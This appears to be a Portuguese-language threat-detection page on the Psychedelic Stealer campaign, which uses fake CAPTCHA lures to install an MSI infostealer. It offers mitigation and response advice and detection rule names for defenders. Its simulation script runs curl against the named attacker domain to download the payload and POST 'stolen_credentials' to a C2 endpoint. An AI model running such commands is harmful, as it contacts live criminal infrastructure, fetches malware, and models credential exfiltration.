O Roubador Psicodélico: Quando um CAPTCHA se Torna um Instalador
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
A Arctic Wolf Labs está acompanhando uma campanha que usa iscas de CAPTCHA falsas do Cloudflare injetadas em sites de negócios ucranianos comprometidos. O ataque no estilo ClickFix convence os usuários a executar um pacote MSI que instala o Psychedelic Stealer, um infostealer projetado para coletar credenciais de navegador, tokens de conta e dados de carteiras de criptomoedas. O malware também suporta tarefa remota persistente por meio de infraestrutura dedicada de C2.
Investigação
A investigação revelou iframes injetados em sites legítimos ucranianos que redirecionam visitantes para um fluxo de verificação falso. Os analistas também identificaram um painel de gerenciamento de iscas com a marca Rublevka TDS, que controla configurações de comando e registra telemetria de visitantes. A análise técnica do payload MSI revelou uma URL de próxima etapa criptografada junto com as rotinas principais do malware para roubo de credenciais e dados.
Mitigação
As organizações devem monitorar a execução suspeita do Windows Installer (msiexec.exe) lançado por navegadores da web ou interfaces de linha de comando. O filtro da web deve bloquear domínios maliciosos conhecidos, enquanto os defensores também devem monitorar ativos web legítimos para injeções de iframe não autorizadas. Fortalecer os controles de endpoint em torno da criação de tarefas agendadas pode reduzir ainda mais o risco de persistência.
Resposta
Quando a atividade do Psychedelic Stealer é detectada, isole os endpoints afetados para impedir a exfiltração de dados ou movimentação lateral. Audite perfis de navegador e armazenamento local para credenciais comprometidas, tokens de autenticação e dados de carteiras. Revise a telemetria de rede para comunicação com infraestrutura de C2 conhecida e inspecione sistemas para tarefas agendadas não autorizadas ou hosts de mensagens nativas suspeitos.
Fluxo de Ataque
Detecções
Entrada suspensa RunMRU com semântica LOLBin (via registry_event)
Possível Tentativa de Instalação de Arquivo MSI Remoto (via cmdline)
Possível Comunicação C2 por HTTP para IP Direto com Porta Incomum (via proxy)
Download de Arquivo Suspeito IP Direto (via proxy)
IOCs (HashSha256) para detectar: O Psychedelic Stealer: Quando um CAPTCHA se torna um Instalador
IOCs (SourceIP) para detectar: O Psychedelic Stealer: Quando um CAPTCHA se torna um Instalador
IOCs (DestinationIP) para detectar: O Psychedelic Stealer: Quando um CAPTCHA se torna um Instalador
Detecção de Acesso à Infraestrutura do Psychedelic Stealer [Servidor Web]
Execução de Simulação
-
Narrativa de Ataque & Comandos: O adversário visa infectar um alvo por meio de um mecanismo falso de CAPTCHA. A simulação irá imitar o comportamento do navegador da vítima: primeiro, navegando para a página de destino do atacante para evitar a inspeção inicial, depois solicitando o payload MSI malicioso e, finalmente, iniciando uma conexão C2 via um POST HTTP para o script de controle do atacante. Esta sequência é projetada para imitar os padrões de URI exatos identificados na infraestrutura do Psychedelic Stealer.
-
Script de Teste de Regressão: O seguinte script usa
curlpara simular os três estágios distintos da lógica de detecção.#!/bin/bash # Script de simulação para Acesso à Infraestrutura do Psychedelic Stealer TARGET_DOMAIN="uasputnik.com" echo "[+] Iniciando Simulação de Infraestrutura do Psychedelic Stealer..." # Fase 1: Simular visitar a página de destino (Seleção 1) echo "[*] Simulando solicitação GET para página de destino..." curl -s -X GET "http://$TARGET_DOMAIN/sputnik.html" -o /dev/null # Fase 2: Simular download do MSI malicioso (Seleção 2) echo "[*] Simulando solicitação GET para payload..." curl -s -X GET "http://$TARGET_DOMAIN/elita.msi" -o /dev/null # Fase 3: Simular Comunicação C2 via POST (Seleção 3) echo "[*] Simulando solicitação POST para ponto de extremidade C2..." curl -s -X POST "http://$TARGET_DOMAIN/admin777111777.php" -d "data=stolen_credentials" -o /dev/null echo "[+] Simulação completa. Verifique SIEM para alertas." -
Comandos de Limpeza:
# Como esta é uma simulação baseada em rede, nenhum arquivo é criado no sistema local # a menos que solicitado especificamente. Nenhuma limpeza necessária para o sistema de arquivos local. echo "[+] Limpeza completa."